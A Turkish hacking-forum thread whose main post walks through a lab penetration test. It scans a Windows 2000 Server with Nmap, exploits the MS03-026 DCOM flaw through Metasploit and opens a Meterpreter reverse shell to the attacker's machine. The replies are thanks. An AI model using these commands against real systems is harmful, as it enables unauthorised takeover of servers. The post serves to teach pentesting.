İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

Mεtasploit ile Windows Server Pentest ~ #ATABÖRÜ // #Stajyer Asistan Kulubü#

08-06-2018 00:17
#1
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Teşekkür (Etti):
950
Teşekkür (Aldı):
903
Konular:
303
Ticaret:
(0) %

Merhaba, arkadaşlar bu konumda sizlere Msfconsole ile Windows Server pentest yapmayı göstereceğim şimdi hemen geçelim :


Bu iş için "N-map" adlı programı kullanacağız İlk öncelikle Nmap nedir biraz ondan bahsedelim :


Fyodor tarafından üretilmiştir. Tamamen özgür bir yazılım olup, hem Windows‘ta hem Linux‘ta hem MacOS‘ta kullanılabilir.

Nmap‘in en genel kullanımı sızma testleri üzerinedir. İlk yapılacak iş ipconfig,ifconfig,iwconfig komutları gibi komutlarla IP adresi öğrenilir. Daha sonra nmap taramasına bırakılır ve nmap kısa bir zaman içinde size hangi portların açık olduğu veya filtreli olduğu, aramanıza göre kullanılan donanım yazılım bilgilerinin versiyon numaralarına kadar listeleyecektir.


Peki, "N-map" toolunu biraz tandığımıza göre, gelelim hangi dil ile yazıldığına arkadaşlar "N-map" hangi dil ile yazıldı C, C++, Python, Lua bu diller kullanılmıştır.


Şimdi, "N-map" tool adlı programı tanıdığımza göre şimdi gelelim yapılışına :


Şimdi arkadaşlar, Uzak sunucu hakkında bize sağlanan tek şey, sadece bilgi. bir Windows 2000 Server olmasıdır ve Hedef, bu uzak sunucunun kabuk erişimini elde etmektir. İlk adım, en popüler port tarama aracı olan "Nmap'ın" adlı tool'un yardımıyla uzak sunucuda tarama yapabileceğiz.

Örnek Uzak sunucunun Nmap taramasını gerçekleştirin, örn. 192.168.220.141





Evet, arkadaşlar Biz burada ne olduğunu fark ettik. ? "135" portu açık. İşimiz daha kolaylaştı Bu nedenle, eğer bu sunucu savunmasız ise, Kabuk erişimindeki betikleri kullanabilir ve kabuk erişimini kazanabiliriz.


Şimdi arkadaşlar burda bize yardımcı olacak tool "Msfconsole" Peki biz bunu nasıl açacağız

M3tasploit Framework'ü terminalinize “ msfconsole ” şeklinde yazarak da açabilirsiniz bu size kalmış bişey. Msfconsole başlatılması sırasında, standart kontroller yapılır. Her şey yolunda giderse ekran görüntüsünü aşağıdaki ekran görüntüsünde göreceğiz.





Şimdi, 135 numaralı bağlantı noktasının açık olduğunu biliyoruz, nerden biliyoruz, Dostlar Çünkü yukarıda belirmiştim. M3tasploit'te ilgili bir RPC istismarını araştırıyoruz. ****sploit tarafından desteklenen tüm istismarları listelemek için “ show exploits ” komutunu kullanıyoruz. Bu istismar, şu anda mevcut olan tüm açıkları listeler.





Fark etmiş olabileceğiniz gibi, M3tasploit Framework'ün varsayılan kurulumu oldukça etkileyici bir stoklama olan 1682 exploit ve 498 yük ile birlikte geliyor , bu nedenle bu büyük listeden özel bir istismar bulmak gerçekten can sıkıcı bir iş olacaktır yani biz burada biraz uğraşacağız. ama olsun öğrenmek güzeldir. Yani, daha iyi bir seçenek kullanıyoruz.


Msfconsole arayzünde “ arama dcerpc ” seçeneğinde bize sunulanacak. o msfconsole pencerede sunulacak bir savunmasız noktası 135'e ilgili tüm patlatır listesi ile sunucuya erişmek için kullanılabilir istismar olarak anahtar kelimeyi dcerpc ile ilgili tüm patlatır aramak için.





Evet arlkadaşlar, Şimdi bi rahatladık. Artık önünüzde rpc açıklamasının önümüze çıkmış bir listesi var, aslında biz kullanmadan önce istismar hakkında daha fazla bilgiye ihtiyacımız var. İstisna ile ilgili daha fazla bilgi almak için , mevcut hedefler, istismar şartları, savunmasızlığın detayları ve hatta daha fazla bilgiyi bulabileceğiniz referanslar gibi bilgiler sağlayan “ exploit / windows / dcerpc / ms03_026_dcom ” komutunu kullanabilirsiniz .





Aynı ekranda gösterdiğim gibi. (:


Şimdi gelelim Komutu “kullanımına” istismar için istismar ortamı harekete geçirir. Bizim durumumuzda, istismarımızı aktive etmek için “ exploit / windows / dcerpc / ms03_026_dcom ” komutunu kullanacağız aynı ekranda gösterdiğim gibi .





Evet, arkadaşlar şimdi Yukarıdaki ekran görüntüsünden, ms03_026_dcom açıklamasının kullanılmasından sonra komut isteminin “ msf> ” den “ msf exploit (ms03_026_dcom)> ” olarak değiştiğine dikkat çekilir , bu da bu istismarın geçici bir ortamına girdiğimizi gösterir yani temiz bir ortama çekildiğimizi gösterir.

Şimdi, mevcut senaryonun ihtiyacına göre sömürüyü yapılandırmamız gerekiyor. “ Show options ” komutunu yazarak bir bakalım ayarlarımız olmuşmu. ? istismarın düzgün bir şekilde başlatılması için gerekli olan çeşitli parametreleri gösterir.





Evet arkadaşlar Şimdi, Bizim örneğimizde, RPORT zaten 135 olarak ayarlanmış ve ayarlanacak tek seçenek “ set RHOST ” komutu kullanılarak ayarlanabilen RHOST'dur .

komutu girin RHOST 192.168.220.141 set ” ve biz RHOST olarak ayarlanır görüyoruz bu şekilde 192.168.220.14





Şu an kullanıma sunduğumuz tek adım, istismarın yükünü ayarlıyor. Kullanılabilir tüm yükleri “ showpayloads ” komutunu kullanarak görüntüleyebiliriz . Aşağıdaki ekran görüntüsünde gösterildiği gibi, “ showpayloads ” komutu seçilen istisna ile uyumlu olan tüm yükleri listeleyecektir.





Şimdi, Bizim durumumuzda, uzak sunucu başarılı bir şekilde kullanıldığında bir kabuk oluşturan “ PAYLOAD windows / meterpreter / reverse_tcp ” komutunu kullanarak ayarlanabilen ters tcp ölçüm aygıtını kullanıyoruz .



Evet... Dışarıdan yük için LHOST'un ayarlanmadığını fark ettik, bu yüzden “ set LHOST 192.168.220.135 “ komutunu kullanarak yerel IP yani 192.168.220.135'i ayarladık .





Evet, arkadaşlar şimdi, Artık her şeyin hazır olduğu ve istismarın doğru bir şekilde yapılandırıldığı için, istismarın başlatılması zamanı geldi.

“ Exploit ” komutu aslında uzak sistemde çalıştırılan yükü çalıştırmak için ne gerekiyorsa yapması gereken saldırıyı başlatır.





Şimdi gelelim, Yukarıdaki ekran görüntüsüne, güvenlik açığından etkilenen bağlantı noktası 135 nedeniyle uzaktan kumandanın 192.168.220.141 numaralı telefonuna karşı başarılı bir şekilde yürütüldüğünü göstermektedir. Bu durum, " sayaç yorumlayıcı" 'ya geçmeden değişiklikle belirtilir .

Artık kurban ile bizim makinemiz arasında bir ters bağlantı kurulduğuna göre, sunucunun tam kontrolüne sahibiz.

Aşağıdaki ekran görüntüsünde görüntülenen ilgili eylemleri gerçekleştirmek için uzak sunucuda tüm komutların bizim tarafımızdan kullanılabileceğini görmek için “ help ” komutunu kullanabiliriz.





Evet, arkadaşlar gecenin yarısında sahuru beklerken konu açıyım dedim ve sizinle eylendim...

Bir teşekkürü çok görmeyin

İyi forumlar...

Not : Eleştirmeyi unutmayın...
Kullanıcı İmzası
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
Konu ATABÖRÜ tarafından (08-06-2018 00:59 Saat 00:59 ) değiştirilmiştir.

08-06-2018 00:26
#2
Üyelik tarihi:
03/2016
Nereden:
pardus@root
Mesajlar:
2.992
Teşekkür (Etti):
772
Teşekkür (Aldı):
702
Konular:
239
Ticaret:
(0) %
Güzel anlatım ellerine sağlık aboneliğe ekledim (:
Kullanıcı İmzası
ATABÖRÜ Teşekkür etti.
08-06-2018 00:26
#3
HeRTeS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Mars
Mesajlar:
1.857
Teşekkür (Etti):
272
Teşekkür (Aldı):
615
Konular:
192
Ticaret:
(0) %
Eline Sağlık. Konun güzel olmuş.
Kullanıcı İmzası
.-.*/-.*/-*./-56842-*-s-*98ss8
08-06-2018 00:27
#4
NoteBox - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
İstanbul
Mesajlar:
1.565
Teşekkür (Etti):
365
Teşekkür (Aldı):
272
Konular:
195
Ticaret:
(0) %
Ellerine sağlık lazım olur bana bir gün
Kullanıcı İmzası
IT'S NEVER TOO LATE
08-06-2018 00:34
#5
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Teşekkür (Etti):
950
Teşekkür (Aldı):
903
Konular:
303
Ticaret:
(0) %
Alıntı:
CyberXhackk´isimli üyeden Alıntı Mesajı göster
Güzel anlatım ellerine sağlık aboneliğe ekledim (:
Alıntı:
NoteBox´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık lazım olur bana bir gün
Alıntı:
HeRTeS´isimli üyeden Alıntı Mesajı göster
Eline Sağlık. Konun güzel olmuş.
Hepinize, teker teker teşekkür ederim arkadaşlar.
Kullanıcı İmzası
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
08-06-2018 01:17
#6
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Teşekkür (Etti):
950
Teşekkür (Aldı):
903
Konular:
303
Ticaret:
(0) %
Güncel ++
Kullanıcı İmzası
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
08-06-2018 09:36
#7
Ataerimz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
MEDELLIN
Mesajlar:
452
Teşekkür (Etti):
20
Teşekkür (Aldı):
55
Konular:
37
Ticaret:
(0) %
Teşekkürler güzel anlattıniz, elinize sağlık.
09-06-2018 03:47
#8
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
09/2016
Mesajlar:
4.974
Teşekkür (Etti):
64
Teşekkür (Aldı):
1193
Konular:
441
Ticaret:
(0) %
Eline emeğine sağlık.
09-06-2018 03:59
#9
Daedalus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Mesajlar:
215
Teşekkür (Etti):
43
Teşekkür (Aldı):
17
Konular:
19
Ticaret:
(0) %
Aklımda bu ****sploit ile ilgili hep ufak tefek sorular kalmıştı az önce bir video izledim ve üzerinede bu yazıyı okuyunca o sorular gitti açıkçası , öönceden araştırdığımda hep program ile hackleme çıkıyordu exploiti seçip exe yapıyoruz vs. exe veya dosya atamdan port ile bu şekilde sızılabiliyormuş konu gerçekten yararlı teşekkürler
Kullanıcı İmzası
if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}
13-07-2018 20:20
#10
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Teşekkür (Etti):
950
Teşekkür (Aldı):
903
Konular:
303
Ticaret:
(0) %
Güncel +++ Arkadaşlar Konu Güncel Kalsınki Size Bişeyler Öğretebilelim. Hem Öğrenelim, Hem Öğretelim Amaç Bu.
Kullanıcı İmzası
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
Konu ATABÖRÜ tarafından (13-07-2018 20:26 Saat 20:26 ) değiştirilmiştir.
M3m0ry Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı